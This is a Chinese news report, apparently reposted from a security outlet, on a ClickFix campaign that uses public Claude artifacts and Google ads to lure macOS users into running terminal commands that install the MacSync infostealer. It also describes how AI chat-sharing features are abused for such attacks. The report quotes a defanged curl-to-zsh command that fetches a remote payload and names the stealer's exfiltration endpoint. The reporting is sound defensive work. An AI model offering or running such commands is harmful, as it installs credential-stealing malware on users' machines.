网易首页 > 网易号 > 正文 申请入驻

黑客滥用Claude发动ClickFix攻击 向macOS用户分发信息窃取木马

0
分享至


黑客正借助Claude共享内容与谷歌广告发起ClickFix攻击,向搜索特定关键词的macOS用户分发信息窃取类恶意软件。研究人员已在野外发现至少两种攻击变体,超过1万名用户访问过包含危险指令的恶意内容。

Claude 共享内容(Claude artifact)是指由用户通过Anthropic大语言模型生成并公开的内容,形式包括指令、教程、代码片段等。这类内容独立于主对话界面,任何人都可通过claude.ai域名下的链接直接访问。

该类页面会提示用户:所展示内容由用户生成,未经准确性验证。

研究人员发现,在谷歌搜索中,“在线DNS解析器”“macOS命令行磁盘空间分析工具”“HomeBrew”等关键词均出现了恶意推广结果。


恶意 HomeBrew 搜索结果

这些搜索结果会跳转到公开的Claude共享内容,或冒充苹果官方支持的Medium文章。两种页面都会诱导用户在终端中粘贴并执行Shell命令。

第一种攻击变体诱导执行的命令为:

echo "..." | base64 -D | zsh

第二种为:

true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh


第二种攻击变体使用伪造苹果支持页面

研究人员发现,该恶意Claude教程页面浏览量已至少达到15600次,这一数据可大致反映受骗用户规模。根据几天前观测到的该页面显示,浏览量为12300次。


Claude 对话中托管的 ClickFix 攻击引导页面

在终端执行上述命令后,系统会下载一个MacSync信息窃取木马的加载器,用于窃取设备上的敏感数据。

研究人员表示,该木马使用硬编码令牌与API密钥连接命令与控制(C2)基础设施,并伪造macOS浏览器UA以伪装成正常流量。

命令执行结果会直接传递给osascript,由AppleScript负责执行实际的窃取行为,包括钥匙串、浏览器数据、加密货币钱包等信息。”

窃取的数据会打包为/tmp/osalogging.zip,通过HTTP POST请求上传至攻击者C2服务器a2abotnet[.]com/gate。若传输失败,压缩包会被拆分为多个小块并重试8次。上传成功后,程序会执行清理操作,抹除所有痕迹。

两种攻击变体均从同一C2地址下载第二阶段载荷,表明背后是同一威胁组织所为。 此前已有类似攻击活动利用ChatGPT、Grok的对话分享功能分发AMOS信息窃取木马。2025年12月,研究人员就发现攻击者利用ChatGPT与Grok对话分享链接,针对macOS用户发动ClickFix攻击。

此次攻击开始滥用Claude,表明大模型滥用已扩散至更多主流平台。安全研究人员提醒用户保持谨慎,不要在终端执行来源不明或无法完全理解的命令。而在同一对话中向聊天机器人询问命令是否安全,是简单有效的判断方法。

参考及来源:https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
迪丽热化妆师被粉丝开撕,怒骂他故意化丑热巴,联合嘉行报复热巴

迪丽热化妆师被粉丝开撕,怒骂他故意化丑热巴,联合嘉行报复热巴

花哥扒娱乐
2026-02-27 21:30:04
2026年浙江高校排名大洗牌!宁大反超浙工大,万里学院杀进前九

2026年浙江高校排名大洗牌!宁大反超浙工大,万里学院杀进前九

Delete丨CC
2026-02-27 20:56:08
我资助的贫困生考上名校后立马拉黑我,毕业时她才发现自己有多傻

我资助的贫困生考上名校后立马拉黑我,毕业时她才发现自己有多傻

黄小乖的日记
2026-02-27 20:04:25
打捞坠海歼35?美国欲逆向仿制中国先进战机,给我们提了个醒

打捞坠海歼35?美国欲逆向仿制中国先进战机,给我们提了个醒

健身狂人
2026-02-27 17:03:15
原来他们是两口子,低调拍戏,都是国家一级演员,如今丁克也幸福

原来他们是两口子,低调拍戏,都是国家一级演员,如今丁克也幸福

卷史
2026-02-27 11:35:54
又一“星二代”想出道,网友:没他爸当年帅,妈妈回应:还没长开

又一“星二代”想出道,网友:没他爸当年帅,妈妈回应:还没长开

娱人细品
2026-02-26 20:38:29
奥运会为什么要用掉那么多避孕套?顶尖运动员旺盛精力更需要满足

奥运会为什么要用掉那么多避孕套?顶尖运动员旺盛精力更需要满足

我心纵横天地间
2026-02-24 08:45:28
何超莲窦骁横琴口岸地下车库被偶遇,恩爱般配!

何超莲窦骁横琴口岸地下车库被偶遇,恩爱般配!

老吴教育课堂
2026-02-27 01:41:35
战争还是和平?美国与伊朗的局势正处于关键的十字路口

战争还是和平?美国与伊朗的局势正处于关键的十字路口

止戈军是我
2026-02-27 21:04:15
刘亦菲背影杀疯了!灰裤黑裙竟如此撩人,你顶得住吗?

刘亦菲背影杀疯了!灰裤黑裙竟如此撩人,你顶得住吗?

娱乐领航家
2026-02-26 20:00:04
央视重磅官宣:歼16单机双锁两架F-22,外军隐身战机吓得再不敢来

央视重磅官宣:歼16单机双锁两架F-22,外军隐身战机吓得再不敢来

52赫兹实验室
2026-02-23 12:43:04
中际旭创:2025年度净利润约107.99亿元,同比增加108.81%

中际旭创:2025年度净利润约107.99亿元,同比增加108.81%

每日经济新闻
2026-02-27 21:09:05
无论多恨川普,在这个议题上恐怕得认可川普:他们疯了

无论多恨川普,在这个议题上恐怕得认可川普:他们疯了

移光幻影
2026-02-27 15:45:31
普陀山不是随便去的!这几件事不懂,不仅容易白跑,还惹麻烦

普陀山不是随便去的!这几件事不懂,不仅容易白跑,还惹麻烦

千秋文化
2026-02-24 20:22:32
大批美国游客涌入中国,回国后坦言:客观对比,中国比美国强多了

大批美国游客涌入中国,回国后坦言:客观对比,中国比美国强多了

灿若银烂
2026-02-27 20:11:39
开拓者4大主力缺阵,10人轮换出场!杨瀚森看清斯普利特表面一套

开拓者4大主力缺阵,10人轮换出场!杨瀚森看清斯普利特表面一套

球场没跑道
2026-02-27 12:03:28
蔚来销售人员接通电话18秒后辱骂客户,并不接听客户回拨电话, 客户称“有电话录音”后,才回电解释辱骂对象“另有其人”

蔚来销售人员接通电话18秒后辱骂客户,并不接听客户回拨电话, 客户称“有电话录音”后,才回电解释辱骂对象“另有其人”

大风新闻
2026-02-26 20:35:10
八段锦这场“骗局”,到底忽悠了多少中国女人

八段锦这场“骗局”,到底忽悠了多少中国女人

美第奇效应
2026-02-27 11:05:07
与撒贝宁同框16年没加微信:杨帆的清醒,打醒了多少硬挤圈子的人

与撒贝宁同框16年没加微信:杨帆的清醒,打醒了多少硬挤圈子的人

草莓解说体育
2026-02-26 13:18:41
AI会在所有事情上超越我们!3800亿估值公司CEO警告:海啸将至人类却假装没看到

AI会在所有事情上超越我们!3800亿估值公司CEO警告:海啸将至人类却假装没看到

知识圈
2026-02-27 16:57:06
2026-02-27 23:55:00
嘶吼RoarTalk incentive-icons
嘶吼RoarTalk
不一样的互联网安全新视界
8178文章数 10545关注度
往期回顾 全部

科技要闻

狂揽1100亿美元!OpenAI再创融资神话

头条要闻

东莞纯电公交大面积停运 公司5.5亿索赔"砍"至6400万

头条要闻

东莞纯电公交大面积停运 公司5.5亿索赔"砍"至6400万

体育要闻

一场必须要赢的比赛,男篮何止击败了裁判

娱乐要闻

郭晶晶霍启刚现身香港艺术节尽显恩爱

财经要闻

沈明高提共富建议 百姓持科技股国家兜底

汽车要闻

岚图泰山黑武士版3月上市 搭载华为四激光智驾方案

态度原创

数码
本地
教育
家居
军事航空

数码要闻

蓝宝石发布黑钻、合金脉动S两款RX 9060 XT显卡,2749元起

本地新闻

津南好·四时总相宜

教育要闻

9科全!山东2026高三核心素养试题及答案汇总!

家居要闻

素色肌理 品意式格调

军事要闻

美国11架F-22隐形战机抵达以色列

无障碍浏览 进入关怀版